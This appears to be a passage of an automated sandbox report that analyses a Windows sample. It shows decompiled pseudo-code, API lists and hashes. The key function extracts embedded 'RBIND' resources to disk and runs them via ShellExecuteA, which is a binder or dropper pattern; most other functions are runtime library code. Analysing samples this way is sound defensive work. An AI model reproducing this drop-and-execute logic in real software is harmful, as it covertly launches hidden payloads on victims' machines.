				_v344 = _a8;
				_v340 = _t113;
				_v280 = 0;
				E003C57C0( &_v279, 0, 0x103);
				_t137 = _t135 - 0x148 + 0xc;
				E003C23A0( &_v279,  &_v336);
				_v8 = 0;
				_t54 = E003C2370( &_v279,  &_v308);
				if( *((intOrPtr*)(_t54 + 0x14)) >= 0x10) {
					_t54 =  *_t54;
				}
				_t106 =  &_v280 - _t54;
				do {
					_t88 =  *_t54;
					 *((char*)(_t106 + _t54)) = _t88;
					_t54 = _t54 + 1;
				} while (_t88 != 0);
				if(_v288 >= 0x10) {
					_push(_v308);
					E003C2BB1();
					_t137 = _t137 + 4;
				}
				_t55 = _t113;
				_t107 = _t113;
				do {
					_t89 =  *_t55;
					_t55 = _t55 + 1;
				} while (_t89 != 0);
				_t56 = _t55 - _t107;
				_t115 =  &_v280 - 1;
				do {
					_t90 =  *(_t115 + 1);
					_t115 = _t115 + 1;
				} while (_t90 != 0);
				_t92 = _t56 >> 2;
				_t128 = _t107;
				_t59 = memcpy(_t128 + _t92 + _t92, _t128, memcpy(_t115, _t128, _t92 << 2) & 0x00000003);
				_t139 = _t137 + 0x18;
				_v288 = 0xf;
				_v292 = 0;
				_v308 = 0;
				_t108 = _t59 + 1;
				do {
					_t97 =  *_t59;
					_t59 = _t59 + 1;
				} while (_t97 != 0);
				E003C1420( &_v280, _t59 - _t108,  &_v308);
				_t63 = _v308;
				if(_v288 < 0x10) {
					_t63 =  &_v308;
				}
				OutputDebugStringA(_t63); // executed
				if(_v288 >= 0x10) {
					_push(_v308);
					E003C2BB1();
					_t139 = _t139 + 4;
				}
				_t131 = FindResourceA(0, _v340, _v344);
				_t66 = CreateFileA( &_v280, 0x40000000, 2, 0, 2, 0x80, 0); // executed
				_t121 = _t66;
				_t67 = SizeofResource(0, _t131);
				WriteFile(_t121, LockResource(LoadResource(0, _t131)), _t67, _v340, 0); // executed
				FindCloseChangeNotification(_t121); // executed
				_t132 = _v320;
				_t72 = _t132;
				if(_t132 >= 1) {
					_t72 = 1;
				}
				_t110 = _v336;
				if(_v316 < 0x10) {
					_t110 =  &_v336;
				}
				if(E003C1040(_t72, "2", _t110) != 0 || _t132 < 1 || (0 | _t132 != 0x00000001) != 0) {
					_t110 =  &_v280;
					ShellExecuteA(0, "open",  &_v280, 0, 0, 5); // executed
				}
				if(_v316 >= 0x10) {
					_push(_v336);
					E003C2BB1();
				}
				 *[fs:0x0] = _v16;
				_pop(_t123);
				_pop(_t133);
				_pop(_t86);
				return E003C2701(1, _t86, _v20 ^ _t134, _t110, _t123, _t133);
			}


















































                                                    0x003c10c3
                                                    0x003c10c5
                                                    0x003c10d0
                                                    0x003c10d7
                                                    0x003c10dc
                                                    0x003c10de
                                                    0x003c10e4
                                                    0x003c10e8
                                                    0x003c10f1
                                                    0x003c1103
                                                    0x003c1109
                                                    0x003c110f
                                                    0x003c1115
                                                    0x003c111a
                                                    0x003c1123
                                                    0x003c112e
                                                    0x003c1131
                                                    0x003c113e
                                                    0x003c1140
                                                    0x003c1140
                                                    0x003c1148
                                                    0x003c1150
                                                    0x003c1150
                                                    0x003c1152
                                                    0x003c1155
                                                    0x003c1156
                                                    0x003c1160
                                                    0x003c1168
                                                    0x003c1169
                                                    0x003c116e
                                                    0x003c116e
                                                    0x003c1171
                                                    0x003c1173
                                                    0x003c1175
                                                    0x003c1175
                                                    0x003c1177
                                                    0x003c1178
                                                    0x003c1182
                                                    0x003c1184
                                                    0x003c1185
                                                    0x003c1185
                                                    0x003c1188
                                                    0x003c1189
                                                    0x003c118f
                                                    0x003c1192
                                                    0x003c11a1
                                                    0x003c11a1
                                                    0x003c11a3
                                                    0x003c11ad
                                                    0x003c11b3
                                                    0x003c11b9
                                                    0x003c11c0
                                                    0x003c11c0
                                                    0x003c11c2
                                                    0x003c11c3
                                                    0x003c11d7
                                                    0x003c11dc
                                                    0x003c11ed
                                                    0x003c11ef
                                                    0x003c11ef
                                                    0x003c11f6
                                                    0x003c1202
                                                    0x003c120a
                                                    0x003c120b
                                                    0x003c1210
                                                    0x003c1210
                                                    0x003c1233
                                                    0x003c1241
                                                    0x003c1251
                                                    0x003c1253
                                                    0x003c126b
                                                    0x003c1272
                                                    0x003c1278
                                                    0x003c127e
                                                    0x003c1283
                                                    0x003c1285
                                                    0x003c1285
                                                    0x003c128a
                                                    0x003c129b
                                                    0x003c129d
                                                    0x003c129d
                                                    0x003c12af
                                                    0x003c12c6
                                                    0x003c12d3
                                                    0x003c12d3
                                                    0x003c12df
                                                    0x003c12e7
                                                    0x003c12e8
                                                    0x003c12ed
                                                    0x003c12f8
                                                    0x003c1300
                                                    0x003c1301
                                                    0x003c1302
                                                    0x003c1310

                                                    APIs
                                                    • _memset.LIBCMT ref: 003C1115
                                                    • OutputDebugStringA.KERNELBASE(?), ref: 003C11F6
                                                    • FindResourceA.KERNEL32(00000000,?,?), ref: 003C1222
                                                    • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 003C1241
                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 003C1253
                                                    • LoadResource.KERNEL32(00000000,00000000,00000000), ref: 003C125C
                                                    • LockResource.KERNEL32(00000000), ref: 003C1263
                                                    • WriteFile.KERNELBASE(00000000,00000000), ref: 003C126B
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 003C1272
                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 003C12D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FileFind$ChangeCloseCreateDebugExecuteLoadLockNotificationOutputShellSizeofStringWrite_memset
                                                    • String ID: open
                                                    • API String ID: 1625157610-2758837156
                                                    • Opcode ID: 0195e4ad51d0e6ef55bac941477c75813296f9e4ab599db97fd4e9fca9531cf7
                                                    • Instruction ID: 0a708c069e9cf53ae1afd0146da513711147c3ad645af6da2dce2e3ce6964c8e
                                                    • Opcode Fuzzy Hash: 0195e4ad51d0e6ef55bac941477c75813296f9e4ab599db97fd4e9fca9531cf7
                                                    • Instruction Fuzzy Hash: D6618171D002289FDB22DB64CC59FEAB7B9FB49700F0545A9E909EB201D734AE84DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 100%
                                                    			E003C1330(struct HINSTANCE__* __eax, intOrPtr __edx) {
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr _t8;

				_t8 = __edx;
				_t1 = __eax;
				if(__eax == 0) {
					_t1 = E003C2E90(__eax);
				}
				_t2 = GetProcAddress(_t1, "ShellExecuteA");
				 *0x3ce944 = _t2;
				if(__imp__ShellExecuteA == 0) {
					E003C2E90(0);
				}
				E003C1EB0(_t8, __imp__ShellExecuteA);
				EnumResourceNamesA(0, "RBIND", E003C10C0, 0);
				_t5 =  *0x3ce940; // 0x75390000
				return FreeLibrary(_t5);
			}






                                                    0x003c1330
                                                    0x003c1330
                                                    0x003c1332
                                                    0x003c1335
                                                    0x003c1335
                                                    0x003c1340
                                                    0x003c134d
                                                    0x003c1352
                                                    0x003c1356
                                                    0x003c1356
                                                    0x003c135b
                                                    0x003c136e
                                                    0x003c1374
                                                    0x003c1380

                                                    APIs
                                                    • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 003C1340
                                                    • EnumResourceNamesA.KERNEL32 ref: 003C136E
                                                    • FreeLibrary.KERNEL32(75390000,?,ShellExecuteA), ref: 003C137A
                                                      • Part of subcall function 003C2E90: _doexit.LIBCMT ref: 003C2E9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressEnumFreeLibraryNamesProcResource_doexit
                                                    • String ID: RBIND$ShellExecuteA
                                                    • API String ID: 2589694317-233069040
                                                    • Opcode ID: e9a1fc450daca6b1f262c00510bda159d3054edea3ae06f6fa768336918a4a7e
                                                    • Instruction ID: 9206909a015a442bda289eab86c9931197be8312e2778639f8987c719e81c1aa
                                                    • Opcode Fuzzy Hash: e9a1fc450daca6b1f262c00510bda159d3054edea3ae06f6fa768336918a4a7e
                                                    • Instruction Fuzzy Hash: F0E04F75A40310A6D623B7B09C0FF8B36AD7710706F06040AF505E90D2CBB5BC409B15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2C38 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 64 3c2c38-3c2c49 call 3c2c0d ExitProcess
                                                    C-Code - Quality: 100%
                                                    			E003C2C38(int _a4) {

				E003C2C0D(_a4);
				ExitProcess(_a4);
			}



                                                    0x003c2c40
                                                    0x003c2c49

                                                    APIs
                                                    • ___crtCorExitProcess.LIBCMT ref: 003C2C40
                                                      • Part of subcall function 003C2C0D: GetModuleHandleW.KERNEL32(mscoree.dll,?,003C2C45,00000000,?,003C3432,000000FF,0000001E,00000001,00000000,00000000,?,003C484E,00000000,00000001,00000000), ref: 003C2C17
                                                      • Part of subcall function 003C2C0D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003C2C27
                                                    • ExitProcess.KERNEL32 ref: 003C2C49
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                    • String ID:
                                                    • API String ID: 2427264223-0
                                                    • Opcode ID: 3e02ecbc99dbfde8a6eb8360f4885a3eb45d8fa269a2488a29c53814a93dc2a0
                                                    • Instruction ID: 81dd9025c17e1ed73fb69f64a4fe1f30d6462c9b21e568acb8aa600cdc59885d
                                                    • Opcode Fuzzy Hash: 3e02ecbc99dbfde8a6eb8360f4885a3eb45d8fa269a2488a29c53814a93dc2a0
                                                    • Instruction Fuzzy Hash: 48B09231000148FBCB022F12DC0EE4E3F2AEB803A0B118025F81889031DF72AD92DBC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C65CB Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 67 3c65cb-3c65d5 68 3c65d7-3c65e1 67->68 69 3c65f2-3c65fb 67->69 68->69 70 3c65e3-3c65f1 call 3c4264 68->70 71 3c65fd 69->71 72 3c65fe-3c6603 69->72 71->72 73 3c6618-3c661f 72->73 74 3c6605-3c6616 RtlAllocateHeap 72->74 77 3c663d-3c6642 73->77 78 3c6621-3c662a call 3c3d86 73->78 74->73 76 3c664a-3c664c 74->76 77->76 81 3c6644 77->81 78->72 83 3c662c-3c6631 78->83 81->76 84 3c6639-3c663b 83->84 85 3c6633 83->85 84->76 85->84
                                                    C-Code - Quality: 86%
                                                    			E003C65CB(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x3ce8c0, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x3ce8c4;
					if( *0x3ce8c4 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E003C3D86(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E003C4264(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                                                    0x003c65d0
                                                    0x003c65d5
                                                    0x003c65f2
                                                    0x003c65f7
                                                    0x003c65f9
                                                    0x003c65fb
                                                    0x003c65fd
                                                    0x003c65fd
                                                    0x003c65fd
                                                    0x00000000
                                                    0x003c6605
                                                    0x003c660e
                                                    0x003c6614
                                                    0x003c6616
                                                    0x00000000
                                                    0x00000000
                                                    0x003c664a
                                                    0x003c664c
                                                    0x00000000
                                                    0x003c6618
                                                    0x003c6618
                                                    0x003c661f
                                                    0x003c663d
                                                    0x003c6640
                                                    0x003c6642
                                                    0x003c6644
                                                    0x003c6644
                                                    0x003c6621
                                                    0x003c6622
                                                    0x003c6628
                                                    0x003c662a
                                                    0x003c65fe
                                                    0x003c65fe
                                                    0x003c6600
                                                    0x003c6603
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x003c662c
                                                    0x003c662c
                                                    0x003c662f
                                                    0x003c6631
                                                    0x003c6633
                                                    0x003c6633
                                                    0x003c6639
                                                    0x003c6639
                                                    0x003c662a
                                                    0x00000000
                                                    0x003c65d7
                                                    0x003c65db
                                                    0x003c65de
                                                    0x003c65e1
                                                    0x00000000
                                                    0x003c65e3
                                                    0x003c65e8
                                                    0x003c65f1
                                                    0x003c65f1
                                                    0x003c65e1
                                                    0x00000000

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,003C4898,00000000,?,00000000,00000000,00000000,?,003C3F10,00000001,00000214), ref: 003C660E
                                                      • Part of subcall function 003C4264: __getptd_noexit.LIBCMT ref: 003C4264
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 328603210-0
                                                    • Opcode ID: 089b02ea6b69de995351f61f69e4dcf806ab88e99b40a8c8071123bc6bbc7011
                                                    • Instruction ID: a65a6c995e3270accd025d4ca2c295d04659c690b0c6103e39768b887359842e
                                                    • Opcode Fuzzy Hash: 089b02ea6b69de995351f61f69e4dcf806ab88e99b40a8c8071123bc6bbc7011
                                                    • Instruction Fuzzy Hash: DD01D431301221ABEB279F65DC16F66339CAB82760F12862DE816CB1D4D730DC11C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2E90 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 86 3c2e90-3c2e9c call 3c2d50 88 3c2ea1-3c2ea5 86->88
                                                    C-Code - Quality: 25%
                                                    			E003C2E90(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E003C2D50(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}









                                                    0x003c2e95
                                                    0x003c2e97
                                                    0x003c2e99
                                                    0x003c2e9c
                                                    0x003c2ea5

                                                    APIs
                                                    • _doexit.LIBCMT ref: 003C2E9C
                                                      • Part of subcall function 003C2D50: __lock.LIBCMT ref: 003C2D5E
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(003CB5D8,00000020,003C2EB7,00000000,00000001,00000000,?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2D9A
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2DAB
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(-00000004,?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2DD1
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2DE4
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2DEE
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DecodePointer$__lock_doexit
                                                    • String ID:
                                                    • API String ID: 3343572566-0
                                                    • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                    • Instruction ID: 1f5d33cf467edca3b1e1ead75d56312ddb583d564390acb61ad4ce2e552faa89
                                                    • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                    • Instruction Fuzzy Hash: CDB0927258020837DA222542AC07F063A0987D0B64E250020BA1D1D1A2A9A2A9628189
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C3DAE Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 89 3c3dae-3c3db6 RtlEncodePointer
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000,003C6286,003CE188,00000314,00000000,?,?,?,?,?,003C4792,003CE188,Microsoft Visual C++ Runtime Library,00012010), ref: 003C3DB0
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: 0969a2b6850b39b9726fb6a5ff7203538ff7ff049684342df25b80eaee678dca
                                                    • Instruction ID: 97100d638f56b15023595802b018edfe58893152650feb9c87acce5907fa4a8f
                                                    • Opcode Fuzzy Hash: 0969a2b6850b39b9726fb6a5ff7203538ff7ff049684342df25b80eaee678dca
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 003C2701 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E003C2701(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x3cd07c; // 0xbd8f316a
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x3cddd8 = _t6;
				 *0x3cddd4 = _t22;
				 *0x3cddd0 = _t25;
				 *0x3cddcc = _t21;
				 *0x3cddc8 = _t27;
				 *0x3cddc4 = _t26;
				 *0x3cddf0 = ss;
				 *0x3cdde4 = cs;
				 *0x3cddc0 = ds;
				 *0x3cddbc = es;
				 *0x3cddb8 = fs;
				 *0x3cddb4 = gs;
				asm("pushfd");
				_pop( *0x3cdde8);
				 *0x3cdddc =  *_t31;
				 *0x3cdde0 = _v0;
				 *0x3cddec =  &_a4;
				 *0x3cdd28 = 0x10001;
				_t11 =  *0x3cdde0; // 0x0
				 *0x3cdcdc = _t11;
				 *0x3cdcd0 = 0xc0000409;
				 *0x3cdcd4 = 1;
				_t12 =  *0x3cd07c; // 0xbd8f316a
				_v812 = _t12;
				_t13 =  *0x3cd080; // 0x4270ce95
				_v808 = _t13;
				 *0x3cdd20 = IsDebuggerPresent();
				_push(1);
				E003C520E(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x3c922c);
				if( *0x3cdd20 == 0) {
					_push(1);
					E003C520E(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                    0x003c2701
                                                    0x003c2701
                                                    0x003c2701
                                                    0x003c2701
                                                    0x003c2701
                                                    0x003c2701
                                                    0x003c2701
                                                    0x003c2707
                                                    0x003c2709
                                                    0x003c2709
                                                    0x003c32a9
                                                    0x003c32ae
                                                    0x003c32b4
                                                    0x003c32ba
                                                    0x003c32c0
                                                    0x003c32c6
                                                    0x003c32cc
                                                    0x003c32d3
                                                    0x003c32da
                                                    0x003c32e1
                                                    0x003c32e8
                                                    0x003c32ef
                                                    0x003c32f6
                                                    0x003c32f7
                                                    0x003c3300
                                                    0x003c3308
                                                    0x003c3310
                                                    0x003c331b
                                                    0x003c3325
                                                    0x003c332a
                                                    0x003c332f
                                                    0x003c3339
                                                    0x003c3343
                                                    0x003c3348
                                                    0x003c334e
                                                    0x003c3353
                                                    0x003c335f
                                                    0x003c3364
                                                    0x003c3366
                                                    0x003c336e
                                                    0x003c3379
                                                    0x003c3386
                                                    0x003c3388
                                                    0x003c338a
                                                    0x003c338f
                                                    0x003c33a3

                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 003C3359
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003C336E
                                                    • UnhandledExceptionFilter.KERNEL32(003C922C), ref: 003C3379
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 003C3395
                                                    • TerminateProcess.KERNEL32(00000000), ref: 003C339C
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: c99f5393faed32ded96af4c5ae27a823219496d521fe3c85759ce48085a41c92
                                                    • Instruction ID: 3cd25dfe3c087956af7cf297038cff0ee58fa76fac50afbb45ef06fe99c2ed29
                                                    • Opcode Fuzzy Hash: c99f5393faed32ded96af4c5ae27a823219496d521fe3c85759ce48085a41c92
                                                    • Instruction Fuzzy Hash: 6A2178B5801214DBDB02DF69FD49E947BACBF88315F11446AF90ACB260EBB0B981CB15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4991 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E003C4991() {

				SetUnhandledExceptionFilter(E003C494F);
				return 0;
			}



                                                    0x003c4996
                                                    0x003c499e

                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000494F), ref: 003C4996
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: b536a60b4fb036bc647033f3766241b88e53c656d5970c71b4dd1fa0d9e3759c
                                                    • Instruction ID: 403a778b478daa3bba94374c5809eed2ea29053dd32d6befde1f017c52ae028f
                                                    • Opcode Fuzzy Hash: b536a60b4fb036bc647033f3766241b88e53c656d5970c71b4dd1fa0d9e3759c
                                                    • Instruction Fuzzy Hash: 5F9002B02511614646431774AC1EF8625A86A48722B422495E816C5058DB6054449711
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C40A7 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 62%
                                                    			E003C40A7(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
